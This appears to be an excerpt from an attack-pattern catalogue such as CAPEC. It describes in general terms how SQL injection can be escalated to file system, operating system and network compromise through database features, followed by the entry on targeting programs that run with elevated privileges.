An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.
CAPEC-69: Target Programs with Elevated Privileges
This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.